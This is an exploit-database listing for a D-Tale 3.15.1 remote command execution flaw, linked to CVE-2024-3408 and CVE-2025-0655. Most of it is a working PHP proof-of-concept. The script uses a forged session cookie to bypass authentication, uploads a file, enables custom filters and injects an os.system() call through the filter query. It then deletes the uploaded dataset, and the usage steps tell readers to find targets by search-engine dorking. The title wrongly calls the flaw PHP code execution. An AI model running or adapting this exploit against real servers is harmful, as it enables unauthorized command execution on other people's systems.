D Tale 3.15.1 Remote Command Execution

🗓️ 13 Mar 2025 00:00:00Reported by indoushkaType

packetstorm🔗 packetstorm.news👁 318 Views

D Tale v3.15.1 has a PHP code execution vulnerability allowing remote command execution.

Reporter	Title	Published	Views	Family All 35
BDU FSTEC	The vulnerability of the dtale library, related to the use of strictly encrypted credentials during the processing of the SECRET_KEY parameter, allows a hacker to bypass existing security restrictions and execute arbitrary code on the server.	6 Jun 202500:00	–	bdu_fstec
Circl	CVE-2024-3408	3 Mar 202512:12	–	circl
Circl	CVE-2025-0655	3 Mar 202512:12	–	circl
CNNVD	D-Tale Input Validation Error Vulnerability	6 Jun 202400:00	–	cnnvd
CNNVD	编号撤回	20 Mar 202500:00	–	cnnvd
CVE	CVE-2024-3408	6 Jun 202418:54	–	cve
CVE	CVE-2025-0655	20 Mar 202510:11	–	cve
Cvelist	CVE-2024-3408 Authentication Bypass and RCE in man-group/dtale	6 Jun 202418:54	–	cvelist
Cvelist	CVE-2025-0655	20 Mar 202510:11	–	cvelist
Huntr	RCE via Global State Override	7 Nov 202411:43	–	huntr

=============================================================================================================================================
    | # Title     : D Tale v3.15.1 PHP code execution vulnerability                                                                             |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |
    | # Vendor    : https://pypi.org/project/dtale/                                                                                             |
    =============================================================================================================================================
    
    POC :
    
    [+] Dorking İn Google Or Other Search Enggine.
    
    [+] Code Description: Exploiting D-Tale Remote Command Execution Vulnerability Using PHP
    
       (Related : https://packetstorm.news/files/id/189509/ Linked CVE numbers:	CVE-2024-3408, CVE-2025-0655  ) .
    	
    [+] save code as poc.php.
    
    [+] Set Target = line 102
    
    [+] Usage = php poc.php
    
    [+] PayLoad :
    
    <?php
    class D_Tale_RCE_Exploit {
    
        private $session = 'eyJsb2dnZWRfaW4iOnRydWUsInVzZXJuYW1lIjoid2hhdGV2ZXIifQ.Z8Jdmw.zUb6b2uEm9ZDKWIOsw2A1xLIuLc';
        private $target_url;
        private $data_id;
        private $payload;
    
        public function __construct($target_url, $payload) {
            $this->target_url = $target_url;
            $this->payload = $payload;
        }
    
        // Function to send GET requests
        private function send_get_request($uri, $headers = []) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $this->target_url . $uri);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    
        // Function to send POST requests
        private function send_post_request($uri, $data, $headers = []) {
            $ch = curl_init();
            curl_setopt($ch, CURLOPT_URL, $this->target_url . $uri);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    
        // Check for vulnerable version
        public function check_vulnerability() {
            $headers = ['Cookie: session=' . $this->session];
            $response = $this->send_get_request('/dtale/popup/upload', $headers);
            
            if (strpos($response, 'version') !== false) {
                preg_match('/<input type="hidden" id="version" value="(.*?)">/', $response, $matches);
                if (isset($matches[1]) && version_compare($matches[1], '3.15.1', '<=')) {
                    return true;
                }
            }
            return false;
        }
    
        // Exploit the vulnerability
        public function exploit() {
            // Step 1: Upload a CSV file to trigger the exploit
            $mime_boundary = "---------------------------" . rand();
            $data = "--$mime_boundary\r\n";
            $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"payload.csv\"\r\n";
            $data .= "Content-Type: text/csv\r\n\r\n";
            $data .= "payload_data\r\n";
            $data .= "--$mime_boundary--\r\n";
    
            $headers = [
                'Content-Type: multipart/form-data; boundary=' . $mime_boundary,
                'Cookie: session=' . $this->session
            ];
    
            $response = $this->send_post_request('/dtale/upload', $data, $headers);
            
            preg_match('/"data_id":"(.*?)"/', $response, $matches);
            if (isset($matches[1])) {
                $this->data_id = $matches[1];
                echo "Data ID: " . $this->data_id . "\n";
            } else {
                echo "Failed to get data ID.\n";
                return;
            }
    
            // Step 2: Enable custom filters
            $settings = json_encode(['enable_custom_filters' => true]);
            $this->send_get_request("/dtale/update-settings/{$this->data_id}?settings=" . urlencode($settings), $headers);
            
            // Step 3: Execute the payload via custom filter
            $query = "@pd.core.frame.com.builtins.__import__('os').system('" . $this->payload . "')";
            $this->send_get_request("/dtale/test-filter/{$this->data_id}?query=" . urlencode($query) . "&save=true", $headers);
    
            echo "Payload executed successfully.\n";
        }
    
        // Cleanup after exploit
        public function cleanup() {
            if ($this->data_id) {
                $headers = ['Cookie: session=' . $this->session];
                $this->send_get_request("/dtale/cleanup-datasets?dataIds={$this->data_id}", $headers);
                echo "Cleaned up the dataset.\n";
            }
        }
    }
    
    // Usage
    $target_url = 'http://target.site.com';
    $payload = 'id'; // Example payload
    
    $exploit = new D_Tale_RCE_Exploit($target_url, $payload);
    
    if ($exploit->check_vulnerability()) {
        echo "Vulnerable version detected. Exploiting...\n";
        $exploit->exploit();
        $exploit->cleanup();
    } else {
        echo "Target is not vulnerable.\n";
    }
    ?>
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================

13 Mar 2025 00:00Current

9.8High risk

Vulners AI Score9.8

CVSS 39.8

EPSS0.77951

SSVC